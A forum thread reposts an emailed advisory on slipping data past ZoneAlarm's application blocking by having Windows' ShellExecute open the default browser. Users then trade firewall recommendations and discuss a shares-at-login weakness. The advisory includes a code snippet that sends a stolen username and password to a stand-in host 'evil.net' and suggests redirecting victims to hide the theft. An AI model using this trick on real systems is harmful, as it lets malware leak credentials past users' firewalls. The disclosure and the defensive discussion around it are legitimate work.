Bypassing ZoneAlarm

[kadeng]

Hi everyone this was one email i just got and i thought i post it .........looks like ZoneAlarm users need to do some reconf.

I don't know if this is a new issue but it is a simple way to

bypass (in some limited form) ZoneAlarm's Application level

Internet access blocking.



Windows dll shell32.dll exports a well known and documented function called

ShellExecute. From Win32 Programmer's refference:



>HINSTANCE ShellExecute(

> HWND hwnd, // handle to parent window

> LPCTSTR lpOperation, // pointer to string that specifies

> // operation to perform

> LPCTSTR lpFile, // pointer to filename or folder name string

> LPCTSTR lpParameters, // pointer to string that specifies

> //executable-file parameters

> LPCTSTR lpDirectory, // pointer to string that specifies default

directory

> INT nShowCmd // whether file is shown when opened

> );



When the lpFile parameter is an Internet url, windows invokes Internet

Explorer (or more accurately - the default web browser), which in 99% of

the cases is allowed to access Internet, with that url. Example:



ShellExecute(

0,

"open",

"http://evil.net/collect.cgiun=stolen_username&pw=stollen_password"

0,

0,

SW_HIDE //This doesn't work.

//I think it is supposed to hide the window but ...

);



The collect.cgi (after storing stolen_username/stolen_password) could

redirect the user for example to

windowsupdate.microsoft.com,

so that many users will not even suspect anything.



The info leaked is limited by the maximum allowed url length, but that

could be more than enough for a malicious application to send some

username/password/cookie/cc_number info to malicious server.



This was tested on ZoneAlarm 3.1.395 (freeware) but i guess that all

versions can be tricked if the user has granted access to his default

web browser by default (very likely)



VENDOR STATUS:

I thing that this is flaw in the core design of ZoneAlarm

(and/or Windows) and don't see a way it can be fixed.



WORKAROUND:

Do not allow ANY application to access Internet by default and

review each request separately.



Any comments are wellcome.

aceh

My comment on this...........It s ALWAY S safer not allowing any app. to access internet by default!!!

[KorpDeath]

It may be safer but what a pain in the @ss that would be for my kids. Having to go through 30- 50 "application allow" popups every day. Why not just use a better product? Outpost anyone? Sygate?

But thanks for the heads up about ZA, not like I'd ever buy it or use it.

[RoadClosed]

I went to their site to see if this was reported and if they have a patch. The site is down

[EINzTEIN]

ZoneAlarm needs to be seriusly checked out-> it MAD.
Sygate is good
xxx

[yourname]

good post thanks for the heads up I will try out Sysgate

[kadeng]

Originally posted here by KorpDeath
It may be safer but what a pain in the @ss that would be for my kids. Having to go through 30- 50 "application allow" popups every day. Why not just use a better product? Outpost anyone? Sygate?

But thanks for the heads up about ZA, not like I'd ever buy it or use it.

Haha your right with kids using a box this would be a major problem!

[VictorKaum]

There are other probs with zonealarm too (at least with the last version I have seen, perhaps it's fixed now but I doubt it)), for instance at the log in screen, ZA is not loaded while the windows networking does. This means that everyone can access the shares on a box, like printing and file sharing, after the log in ZA limits this to the internal network... so a box at the login screen is not protected by ZA. IMHO sygate or outpost are a better choice desktop firewall.

[bballad]

What’s with all the zone labs bashing. This is a windows issue and will affect any personal firewall the same way...the firewall can stop an application but not a specific site unless you tell it what site to block. More over to pull off this exploit you need to get local access to the system or a Trojan loaded and run on the systems as you cannot normally do shell commands remotely (most windows boxes are not running telnet services). At the point some one is local/has your system compromised with a Trojan they can get your info with out using this method so your best defense in this case is to not let malicious users on the system.

Victor the true vector defense in Zonlabs is a service and loads when windows boots (as with all services) you are protected as soon as windows boots. The "You are now protected" splash screen is just the intro to the GUI.

[VictorKaum]

bballad, you have some excellent points, but about the splash screen thingie I have to disagree with you on that. Yep, they say it's true vector defense does what you describe, but I tested this in a little test setup and was able to access the default shares with early versions of zonelabs. That was very surprising cause I thought, like you, that the protection did work before the splash screen. I know the splash screen is only the GUI intro but there seems still to be a slight problem with the true vector idea:
It was discussed in a thread here at AO. http://www.antionline.com/showthread...ight=ZoneAlarm
Basicly it means that if you allow local shares, but do not allow local shares in ZA, by setting no trusted neigbourhood networks and highest security degree, it still will allow them when you are at the login screen. This is not a big deal, I know, and probably other products have this weakness too.

[kadeng]

This is not a big deal, I know, and probably other products have this weakness too. [/B][/QUOTE]

Think your right on this one Vic.Software takes time to load before that no defense..........hardware on the other hand.......instant protection!

But like you said not a big deal if you use a good av product and practise safe computing!